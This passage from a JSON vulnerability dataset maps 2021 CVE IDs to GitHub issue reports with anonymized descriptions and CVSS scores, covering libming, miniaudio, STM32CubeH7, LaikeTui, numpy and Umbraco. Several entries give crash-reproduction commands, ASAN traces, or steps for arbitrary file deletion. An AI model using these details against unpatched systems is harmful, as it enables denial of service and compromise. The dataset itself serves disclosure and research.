located NUMBERTAG bytes to the right of NUMBERTAG byte region FILETAG",
  67999. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  68000. "severity": "MEDIUM",
  68001. "baseScore": 5.5,
  68002. "impactScore": 3.6,
  68003. "exploitabilityScore": 1.8
  68004. },
  68005. {
  68006. "CVE_ID": "CVE-2021-3410",
  68007. "Issue_Url_old": "https://github.com/cacalabs/libcaca/issues/52",
  68008. "Issue_Url_new": "https://github.com/cacalabs/libcaca/issues/52",
  68009. "Repo_new": "cacalabs/libcaca",
  68010. "Issue_Created_At": "2021-02-14T02:07:08Z",
  68011. "description": "CVETAG . Following vulnerability has been reported to Red Hat issue tracker: CVETAG",
  68012. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  68013. "severity": "HIGH",
  68014. "baseScore": 7.8,
  68015. "impactScore": 5.9,
  68016. "exploitabilityScore": 1.8
  68017. },
  68018. {
  68019. "CVE_ID": "CVE-2021-34122",
  68020. "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/36",
  68021. "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/36",
  68022. "Repo_new": "rockcarry/ffjpeg",
  68023. "Issue_Created_At": "2021-05-13T09:08:27Z",
  68024. "description": "null pointer dereference in function APITAG in bitstr.c. Hi, There is null pointer dereference in function APITAG and APITAG in bitstr.c. Didn't check whether the stream is valid . CODETAG version NUMBERTAG ab ERRORTAG e (latest one) env ubuntu NUMBERTAG gcc version NUMBERTAG reproduce: make ./ffjpeg e poc FILETAG debug info CODETAG",
  68025. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  68026. "severity": "MEDIUM",
  68027. "baseScore": 5.5,
  68028. "impactScore": 3.6,
  68029. "exploitabilityScore": 1.8
  68030. },
  68031. {
  68032. "CVE_ID": "CVE-2021-34129",
  68033. "Issue_Url_old": "https://github.com/bettershop/LaikeTui/issues/9",
  68034. "Issue_Url_new": "https://github.com/bettershop/laiketui/issues/9",
  68035. "Repo_new": "bettershop/laiketui",
  68036. "Issue_Created_At": "2021-06-01T15:55:50Z",
  68037. "description": "Arbitrary file deletion leads to system reinstallation vulnerabilities. When the system is successfully installed, the system will generate the APITAG file in the /data/ directory. When the user wants to reinstall, it will first determine whether the APITAG file exists. If it exists, the installation cannot be repeated, but we can find one To delete any file, delete the APITAG file, you can directly reinstall the system. The parameters APITAG $oldpic, and $imgurl are all controllable\uff1a FILETAG Vulnerability recurrence: first log in to the background to access the link : URLTAG domain PATHTAG then publish an article. FILETAG Then modify the article: FILETAG Before proceeding with any file deletion, visit the install directory: FILETAG Replace parameters and delete any files: FILETAG FILETAG Visit the install directory again and find that arbitrary file deletion has been implemented, which leads to reinstallation vulnerabilities. FILETAG ERRORTAG",
  68038. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
  68039. "severity": "HIGH",
  68040. "baseScore": 8.1,
  68041. "impactScore": 5.2,
  68042. "exploitabilityScore": 2.8
  68043. },
  68044. {
  68045. "CVE_ID": "CVE-2021-34141",
  68046. "Issue_Url_old": "https://github.com/numpy/numpy/issues/18993",
  68047. "Issue_Url_new": "https://github.com/numpy/numpy/issues/18993",
  68048. "Repo_new": "numpy/numpy",
  68049. "Issue_Created_At": "2021-05-12T02:04:35Z",
  68050. "description": "Unsecure string comparison (incomplete comparison) in _convert_from_str of descriptor.c. APITAG Reproducing code example: Snippet : / Check for a deprecated Numeric style typecode / / Uint has deliberately weird uppercasing / char dep_tps FILETAG APITAG version information: the main branch of APITAG",
  68051. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  68052. "severity": "MEDIUM",
  68053. "baseScore": 5.3,
  68054. "impactScore": 1.4,
  68055. "exploitabilityScore": 3.9
  68056. },
  68057. {
  68058. "CVE_ID": "CVE-2021-34184",
  68059. "Issue_Url_old": "https://github.com/mackron/miniaudio/issues/319",
  68060. "Issue_Url_new": "https://github.com/mackron/miniaudio/issues/319",
  68061. "Repo_new": "mackron/miniaudio",
  68062. "Issue_Created_At": "2021-06-06T15:45:59Z",
  68063. "description": "Double free vulnerability cause buffer overflow. Hi Team, Double Free vulnerability cause buffer overflow is observed in FILETAG while fuzzing MINIAUDIO APITAG and master branch) using ASAN with AFL FUZZER Steps to Reproduce cd examples afl gcc fsanitize=address fsanitize=leak fsanitize=undefined simple_looping.c o simple_looping ldl lm lpthread ./simple_looping POC1 Download link to POC1 URLTAG OUTPUT APITAG NUMBERTAG ERROR: APITAG attempting double free on NUMBERTAG in thread T NUMBERTAG f NUMBERTAG cf in __interceptor_free ( PATHTAG NUMBERTAG f NUMBERTAG in _IO_fclose ( PATHTAG NUMBERTAG f NUMBERTAG in __interceptor_fclose ( PATHTAG NUMBERTAG b7e0b in ma_default_vfs_close__stdio .. APITAG NUMBERTAG b7e0b in ma_default_vfs_close .. APITAG NUMBERTAG b7e0b in ma_vfs_or_default_close .. APITAG NUMBERTAG b7e0b in ma_vfs_or_default_close .. APITAG NUMBERTAG b7e0b in ma_decoder_init_vfs .. APITAG NUMBERTAG in ma_decoder_init_file .. APITAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG b2 in __libc_start_main ( PATHTAG NUMBERTAG d in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG freed by thread T0 here NUMBERTAG f NUMBERTAG cf in __interceptor_free ( PATHTAG NUMBERTAG f NUMBERTAG in _IO_fclose ( PATHTAG ) previously allocated by thread T0 here NUMBERTAG f NUMBERTAG bc8 in malloc ( PATHTAG NUMBERTAG f NUMBERTAG aad in _IO_fopen ( PATHTAG ) SUMMARY: APITAG double free ( PATHTAG ) in __interceptor_free NUMBERTAG ABORTING Request team to implement proper patch and validate",
  68064. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  68065. "severity": "CRITICAL",
  68066. "baseScore": 9.8,
  68067. "impactScore": 5.9,
  68068. "exploitabilityScore": 3.9
  68069. },
  68070. {
  68071. "CVE_ID": "CVE-2021-34185",
  68072. "Issue_Url_old": "https://github.com/mackron/miniaudio/issues/320",
  68073. "Issue_Url_new": "https://github.com/mackron/miniaudio/issues/320",
  68074. "Repo_new": "mackron/miniaudio",
  68075. "Issue_Created_At": "2021-06-06T15:51:52Z",
  68076. "description": "Integer based buffer overflow vulnerability. Hi Team, Integer based buffer overflow caused by out of bound left shift is observed in FILETAG while fuzzing MINIAUDIO APITAG and master branch) using UBSAN enabled in AFL FUZZER Vulnerable code from miniaudio.h DRWAV_API drwav_uint NUMBERTAG drwav_bytes_to_u NUMBERTAG const drwav_uint8 data) { return (data NUMBERTAG data NUMBERTAG data NUMBERTAG data NUMBERTAG Steps to Reproduce cd examples afl gcc fsanitize=address fsanitize=leak fsanitize=undefined simple_looping.c o simple_looping ldl lm lpthread ./simple_looping POC2 Download link to [POC2 URLTAG OUTPUT .. APITAG runtime error: left shift of NUMBERTAG by NUMBERTAG places cannot be represented in type 'int' Request team to implement proper patch and validate",
  68077. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  68078. "severity": "HIGH",
  68079. "baseScore": 7.8,
  68080. "impactScore": 5.9,
  68081. "exploitabilityScore": 1.8
  68082. },
  68083. {
  68084. "CVE_ID": "CVE-2021-34254",
  68085. "Issue_Url_old": "https://github.com/umbraco/Umbraco-CMS/issues/9782",
  68086. "Issue_Url_new": "https://github.com/umbraco/umbraco-cms/issues/9782",
  68087. "Repo_new": "umbraco/umbraco-cms",
  68088. "Issue_Created_At": "2021-02-09T07:16:26Z",
  68089. "description": "NUMBERTAG Open redirect security issue insufficient url sanitization on APITAG Summary A security report alerted us to an issue where APITAG could be used as an open redirect URLTAG , which is used for phishing attacks, making it seem that the URL you're clicking is a legitimate site, but you get redirected to a malicious site by that legitimate site. Note that anybody trying to use this vulnerability on your Umbraco site would see the following interstitial page for NUMBERTAG seconds: FILETAG Severity We rate this as a medium level security problem. Although the exploit is available for an unauthenticated attacker, no data can be altered on the target Umbraco site. Mitigation Umbraco NUMBERTAG mitigates the specific exploit method and we advise you to upgrade to that version. Workarounds for older versions Alternatively, for any site with a version lower than NUMBERTAG we recommend you remove APITAG , which will mitigates the problem as well. This file is not often in active use and is therefore safe to remove for most people. Alternatively, if you think your site is often displaying the booting screen, you can update this page, with FILETAG . Please note that your deployment strategy might include a APITAG restore which will restore APITAG on each deploy, make sure to take steps to prevent this file from being deployed. Similarly, if you do update APITAG without upgrading to Umbraco NUMBERTAG APITAG will overwrite it, so make sure that you only deploy the updated version. Credits We'd like to thank Marcin W\u0119g\u0142owski and Mariusz Pop\u0142awski from FILETAG for reporting the issue and validating the fix.",
  68090. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  68091. "severity": "MEDIUM",
  68092. "baseScore": 6.1,
  68093. "impactScore": 2.7,
  68094. "exploitabilityScore": 2.8
  68095. },
  68096. {
  68097. "CVE_ID": "CVE-2021-34259",
  68098. "Issue_Url_old": "https://github.com/STMicroelectronics/STM32CubeH7/issues/76",
  68099. "Issue_Url_new": "https://github.com/stmicroelectronics/stm32cubeh7/issues/76",
  68100. "Repo_new": "stmicroelectronics/stm32cubeh7",
  68101. "Issue_Created_At": "2020-10-14T22:38:58Z",
  68102. "description": "No validity checking on the variable cfg_desc APITAG Describe the set up Software: APITAG MCU & MPU Packages Version: APITAG Verification Hardware Platform: STM NUMBERTAG H7B3 Describe the bug Function: static void APITAG cfg_desc, uint8_t buf, uint NUMBERTAG t length) Location: URLTAG Type: Buffer Overflow Result: The system could be configured incorrectly with wrong parameters. Description: The function APITAG parses the configuration descriptor, interface descriptor, and endpoint descriptor by input data from a USB device. However, it doesn\u2019t check the validity of the variable cfg_desc APITAG compared with the total length of the input buffer as shown in URLTAG This will cause the following program including calling to the function APITAG APITAG and APITAG configure the system incorrectly. How To Reproduce NUMBERTAG Running APITAG application on the STM NUMBERTAG H7B3I platform NUMBERTAG Plug a usb disk NUMBERTAG Use the attached FILETAG to replace USB device packet Additional context To patch it, the program should check if reach the end of input buffer when plus cfg_desc APITAG FILETAG",
  68103. "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  68104. "severity": "MEDIUM",
  68105. "baseScore": 6.8,
  68106. "impactScore": 5.9,
  68107. "exploitabilityScore": 0.9
  68108. },
  68109. {
  68110. "CVE_ID": "CVE-2021-34260",
  68111. "Issue_Url_old": "https://github.com/STMicroelectronics/STM32CubeH7/issues/83",
  68112. "Issue_Url_new": "https://github.com/stmicroelectronics/stm32cubeh7/issues/83",
  68113. "Repo_new": "stmicroelectronics/stm32cubeh7",
  68114. "Issue_Created_At": "2020-10-14T23:17:15Z",
  68115. "description": "Buffer Overflow due to the variable if_descriptor APITAG Describe the set up Software: APITAG MCU & MPU Packages Version: APITAG Verification Hardware Platform: STM NUMBERTAG H7B3 Describe the bug Function: static void APITAG if_descriptor, uint8_t buf) Location: URLTAG Type: Buffer Overflow Result: The system could be configured incorrectly with wrong parameters. Description: The function APITAG parse interface descriptor. It\u2019s called by the function APITAG as shown in URLTAG It doesn\u2019t check the validity of the variable if_descriptor APITAG compared with the total length of the input buffer which may cause a buffer overflow by the following called function APITAG as shown in URLTAG How To Reproduce NUMBERTAG Running APITAG application on the STM NUMBERTAG H7B3I platform NUMBERTAG Plug a USB disk NUMBERTAG Use the attached FILETAG to replace the USB device packet. FILETAG Additional context To patch it, the program should check if reach the end of the input buffer when plus if_descriptor APITAG",
  68116. "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  68117. "severity": "MEDIUM",
  68118. "baseScore": 6.8,
  68119. "impactScore": 5.9,
  68120. "exploitabilityScore": 0.9
  68121. },
  68122. {
  68123. "CVE_ID": "CVE-2021-34261",
  68124. "Issue_Url_old": "https://github.com/STMicroelectronics/STM32CubeH7/issues/78",
  68125. "Issue_Url_new": "https://github.com/stmicroelectronics/stm32cubeh7/issues/78",
  68126. "Repo_new": "stmicroelectronics/stm32cubeh7",
  68127. "Issue_Created_At": "2020-10-14T22:46:03Z",
  68128. "description": "Lack hardware wake up support checking. Describe the set up Software: APITAG MCU & MPU Packages Version: APITAG Verification Hardware Platform: STM NUMBERTAG H7B3 Describe the bug Function: static void APITAG cfg_desc, uint8_t buf, uint NUMBERTAG t length) Location: URLTAG Type: Denial of Service. Result: The system will hang when trying to set a remote wake up feature. Description: The function APITAG parses the configuration descriptor, interface descriptor, and endpoint descriptor by input data from a USB device. And it set the variable cfg_desc APITAG by the input data from the USB device. This variable will be used as part of a judgment in the function APITAG as shown in URLTAG With a malformed value, the remote wakeup may be enabled as shown in URLTAG If the hardware doesn\u2019t support this feature, the system will hang due to a FAIL return value by the function APITAG How To Reproduce NUMBERTAG Running APITAG application on the STM NUMBERTAG H7B3I platform NUMBERTAG Plug a USB disk NUMBERTAG Use the attached FILETAG to replace the USB device packet Additional context To patch it, the program should check if the hardware supports a remote wake up FILETAG feature.",
  68129. "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  68130. "severity": "MEDIUM",
  68131. "baseScore": 4.6,
  68132. "impactScore": 3.6,
  68133. "exploitabilityScore": 0.9
  68134. },
  68135. {
  68136. "CVE_ID": "CVE-2021-34262",
  68137. "Issue_Url_old": "https://github.com/STMicroelectronics/STM32CubeH7/issues/81",
  68138. "Issue_Url_new": "https://github.com/stmicroelectronics/stm32cubeh7/issues/81",
  68139. "Repo_new": "stmicroelectronics/stm32cubeh7",
  68140. "Issue_Created_At": "2020-10-14T22:57:52Z",
  68141. "description": "No checking if ep_descriptor APITAG is greater than zero. Describe the set up Software: APITAG MCU & MPU Packages Version: APITAG Verification Hardware Platform: STM NUMBERTAG H7B3 Describe the bug Function: static void APITAG ep_descriptor, uint8_t buf) Location: URLTAG Type: Denial of Service. Result: The system will hang when try to communicate with the endpoint. Description: The function APITAG parses the endpoint descriptor of a USB device. It doesn\u2019t check if the variable ep_descriptor APITAG is greater than zero as shown in URLTAG If zero, the MSC handler will not able to communicate with the outside world as shown from line NUMBERTAG to line NUMBERTAG in FILETAG How To Reproduce NUMBERTAG Running APITAG application on the STM NUMBERTAG H7B3I platform NUMBERTAG Plug a USB disk NUMBERTAG Use the attached FILETAG to replace the USB device packet. FILETAG Additional context To patch it, the program should check if ep_descriptor APITAG is greater than zero.",
  68142. "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  68143. "severity": "MEDIUM",
  68144. "baseScore": 6.8,
  68145. "impactScore": 5.9,
  68146. "exploitabilityScore": 0.9
  68147. },
  68148. {
  68149. "CVE_ID": "CVE-2021-34267",
  68150. "Issue_Url_old": "https://github.com/STMicroelectronics/STM32CubeH7/issues/80",
  68151. "Issue_Url_new": "https://github.com/stmicroelectronics/stm32cubeh7/issues/80",
  68152. "Repo_new": "stmicroelectronics/stm32cubeh7",
  68153. "Issue_Created_At": "2020-10-14T22:56:01Z",
  68154. "description": "No checking on both IN and OUT pipe constructed. Describe the set up Software: APITAG MCU & MPU Packages Version: APITAG Verification Hardware Platform: STM NUMBERTAG H7B3 Describe the bug Function: static APITAG APITAG phost) Location: From line NUMBERTAG to line NUMBERTAG in FILETAG Type: Denial of Service. Result: The system will hang when try to communicate with the endpoint. Description: The function APITAG inits the status of MSC handler. It initializes the IN endpoint and OUT endpoint as shown from line NUMBERTAG to line NUMBERTAG in FILETAG However, when the variable APITAG of endpoint descriptor are both masked as IN or OUT without checking as shown in URLTAG the MSC handler will also only initialize the IN or OUT part as shown from line NUMBERTAG to line NUMBERTAG in FILETAG How To Reproduce NUMBERTAG Running APITAG application on the STM NUMBERTAG H7B3I platform NUMBERTAG Plug a USB disk NUMBERTAG Use the attached FILETAG to replace the USB device packet. FILETAG Additional context To patch it, the program should check both IN and OUT pipe is constructed.",
  68155. "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  68156. "severity": "MEDIUM",
  68157. "baseScore": 4.6,
  68158. "impactScore": 3.6,
  68159. "exploitabilityScore": 0.9
  68160. },
  68161. {
  68162. "CVE_ID": "CVE-2021-34268",
  68163. "Issue_Url_old": "https://github.com/STMicroelectronics/STM32CubeH7/issues/75",
  68164. "Issue_Url_new": "https://github.com/stmicroelectronics/stm32cubeh7/issues/75",
  68165. "Repo_new": "stmicroelectronics/stm32cubeh7",
  68166. "Issue_Created_At": "2020-10-14T22:33:50Z",
  68167. "description": "No validity chekcing on dev_desc APITAG Describe the set up Software: APITAG MCU & MPU Packages Version: APITAG Verification Hardware Platform: STM NUMBERTAG H7B3 Describe the bug Function: static void APITAG dev_desc, uint8_t buf, uint NUMBERTAG t length) Location: URLTAG Type: Denial of Service. Result: A malformed USB device packet may cause the system hang when it tries to communicate with the outside world. Description: The function APITAG parses the device descriptor by input data from a USB device. The valid max packet size of the device descriptor should be NUMBERTAG and NUMBERTAG as USB specification required. However, the function APITAG doesn\u2019t check the value of dev_desc APITAG as shown in URLTAG The variable dev_desc APITAG will be used as the size to construct the control pipe between host and device as shown in URLTAG If APITAG is zero, the firmware will get the error status USBH_FAIL in the function APITAG called by the function APITAG when trying to communicate with the outside world by IN and OUT pipe in the future and the host will try to re enumerate. This process will loop again and again. How To Reproduce NUMBERTAG Running APITAG application on the STM NUMBERTAG H7B3I platform NUMBERTAG Plug a usb disk NUMBERTAG Use the attached FILETAG to replace USB device packet Additional context If you have a first analysis or patch correction, thank you to share your proposal. To patch it, the program should check if dev_desc APITAG is equal to NUMBERTAG or NUMBERTAG At least, it should be greater than zero. FILETAG",
  68168. "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  68169. "severity": "MEDIUM",
  68170. "baseScore": 4.6,
  68171. "impactScore": 3.6,
  68172. "exploitabilityScore": 0.9
  68173. },
  68174. {
  68175. "CVE_ID": "CVE-2021-34338",
  68176. "Issue_Url_old": "https://github.com/libming/libming/issues/201",
  68177. "Issue_Url_new": "https://github.com/libming/libming/issues/201",
  68178. "Repo_new": "libming/libming",
  68179. "Issue_Created_At": "2020-08-24T13:27:16Z",
  68180. "description": "Segmentation fault in function APITAG APITAG Hi, there. There is a segmentation fault in the newest master branch NUMBERTAG aee NUMBERTAG Here is the reproducing command: ~~~~ swftophp poc ~~~~ POC: FILETAG Here is the reproduce trace reported by ASAN NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG ef NUMBERTAG bp NUMBERTAG c NUMBERTAG fb sp NUMBERTAG ffee NUMBERTAG T NUMBERTAG ef NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG b in APITAG PATHTAG NUMBERTAG b NUMBERTAG b in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG d9 in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG b NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG APITAG NUMBERTAG ABORTING ~~~~ The cause is due to the incomplete check in line NUMBERTAG mentioned in the Figure. APITAG",
  68181. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  68182. "severity": "MEDIUM",
  68183. "baseScore": 6.5,
  68184. "impactScore": 3.6,
  68185. "exploitabilityScore": 2.8
  68186. },
  68187. {
  68188. "CVE_ID": "CVE-2021-34339",
  68189. "Issue_Url_old": "https://github.com/libming/libming/issues/202",
  68190. "Issue_Url_new": "https://github.com/libming/libming/issues/202",
  68191. "Repo_new": "libming/libming",
  68192. "Issue_Created_At": "2020-08-24T13:33:55Z",
  68193. "description": "Segmentation fault in function APITAG APITAG Hi, there. There is a segmentation fault in the newest master branch NUMBERTAG aee NUMBERTAG Here is the reproducing command: ~~~~ swftophp poc ~~~~ POC: FILETAG Here is the reproduce trace reported by ASAN NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG d8dc bp NUMBERTAG fffd NUMBERTAG f NUMBERTAG sp NUMBERTAG ffe NUMBERTAG f8bb0 T NUMBERTAG d8db in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG d9 in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG fe9f9c NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG b NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG APITAG NUMBERTAG ABORTING ~~~~ The cause is due to the uncheck index of act APITAG mentioned in Figure. APITAG",
  68194. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  68195. "severity": "MEDIUM",
  68196. "baseScore": 6.5,
  68197. "impactScore": 3.6,
  68198. "exploitabilityScore": 2.8
  68199. },
  68200. {
  68201. "CVE_ID": "CVE-2021-34340",
  68202. "Issue_Url_old": "https://github.com/libming/libming/issues/203",
  68203. "Issue_Url_new": "https://github.com/libming/libming/issues/203",
  68204. "Repo_new": "libming/libming",
  68205. "Issue_Created_At": "2020-08-25T10:33:55Z",
  68206. "description": "Segmentation fault in function APITAG decompile.c NUMBERTAG Hi, there. There is a segmentation fault in the newest master branch NUMBERTAG aee NUMBERTAG Here is the reproducing command: ~~~~ swftophp poc ~~~~ POC: FILETAG Here is the reproduce trace reported by ASAN NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG c bp NUMBERTAG f0 sp NUMBERTAG ffdbd NUMBERTAG ccf0 T NUMBERTAG b in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG d9 in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG fd NUMBERTAG eb NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG b NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG APITAG NUMBERTAG ABORTING ~~~~ The cause might due to the incomplete check related to the index for array regs. APITAG",
  68207. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  68208. "severity": "MEDIUM",
  68209. "baseScore": 6.5,
  68210. "impactScore": 3.6,
  68211. "exploitabilityScore": 2.8
  68212. },
  68213. {
  68214. "CVE_ID": "CVE-2021-34341",
  68215. "Issue_Url_old": "https://github.com/libming/libming/issues/204",
  68216. "Issue_Url_new": "https://github.com/libming/libming/issues/204",
  68217. "Repo_new": "libming/libming",
  68218. "Issue_Created_At": "2020-08-25T10:45:49Z",
  68219. "description": "Buffer overflow in APITAG APITAG Hi, there. There is a buffer overflow in the newest master branch NUMBERTAG aee NUMBERTAG Here is the reproducing command: ~~~~ swftophp poc ~~~~ POC: FILETAG Here is the reproduce trace reported by ASAN NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG e NUMBERTAG dc NUMBERTAG at pc NUMBERTAG d NUMBERTAG bp NUMBERTAG ffd NUMBERTAG c NUMBERTAG sp NUMBERTAG ffd NUMBERTAG c NUMBERTAG READ of size NUMBERTAG at NUMBERTAG e NUMBERTAG dc NUMBERTAG thread T NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG c5c in APITAG PATHTAG NUMBERTAG c5c in APITAG PATHTAG NUMBERTAG d3d4 in APITAG PATHTAG NUMBERTAG d3d4 in APITAG PATHTAG NUMBERTAG c NUMBERTAG b in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f8b NUMBERTAG e NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG b NUMBERTAG in _start ( PATHTAG NUMBERTAG e NUMBERTAG dc NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f8b NUMBERTAG fa in __interceptor_calloc ( PATHTAG NUMBERTAG e4cc in APITAG PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG APITAG Shadow bytes around the buggy address NUMBERTAG c1c7fff9b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c1c7fff9b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c1c7fff9b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c1c7fff9b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c1c7fff9b NUMBERTAG c1c7fff9b NUMBERTAG fa[fa]fa fa fa fa fa fa fd fd fd fd fd fd fd fd NUMBERTAG c1c7fff9ba0: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa NUMBERTAG c1c7fff9bb0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c1c7fff9bc0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa NUMBERTAG c1c7fff9bd NUMBERTAG c1c7fff9be NUMBERTAG fa fa fa fa fa fa fa fa fd fd fd fd Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING ~~~~",
  68220. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  68221. "severity": "MEDIUM",
  68222. "baseScore": 6.5,
  68223. "impactScore": 3.6,
  68224. "exploitabilityScore": 2.8
  68225. },
  68226. {
  68227. "CVE_ID": "CVE-2021-34342",
  68228. "Issue_Url_old": "https://github.com/libming/libming/issues/205",
  68229. "Issue_Url_new": "https://github.com/libming/libming/issues/205",
  68230. "Repo_new": "libming/libming",
  68231. "Issue_Created_At": "2020-08-25T10:55:36Z",
  68232. "description": "Buffer overflow in APITAG APITAG Hi, there. There is a buffer overflow in the newest master branch NUMBERTAG aee NUMBERTAG which causes a huge memory information leakage. Here is the reproducing command: ~~~~ swftophp poc ~~~~ POC: FILETAG Here is the reproduce trace reported by ASAN NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG at pc NUMBERTAG f2f NUMBERTAG b bp NUMBERTAG ffcf NUMBERTAG sp NUMBERTAG ffcf NUMBERTAG b NUMBERTAG READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG f2f NUMBERTAG a in strlen ( PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG db7 in APITAG PATHTAG NUMBERTAG db7 in APITAG PATHTAG NUMBERTAG d3d4 in APITAG PATHTAG NUMBERTAG d3d4 in APITAG PATHTAG NUMBERTAG c NUMBERTAG b in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f2f NUMBERTAG cc NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG b NUMBERTAG in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f2f NUMBERTAG c1 in realloc ( PATHTAG NUMBERTAG b7b in APITAG PATHTAG SUMMARY: APITAG heap buffer overflow NUMBERTAG strlen Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fffcc NUMBERTAG c NUMBERTAG fffcc NUMBERTAG c NUMBERTAG fffcca NUMBERTAG c NUMBERTAG fffccb NUMBERTAG c NUMBERTAG fffccc NUMBERTAG c NUMBERTAG fffccd0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffcce0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffccf0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fffcd NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fffcd NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fffcd NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte 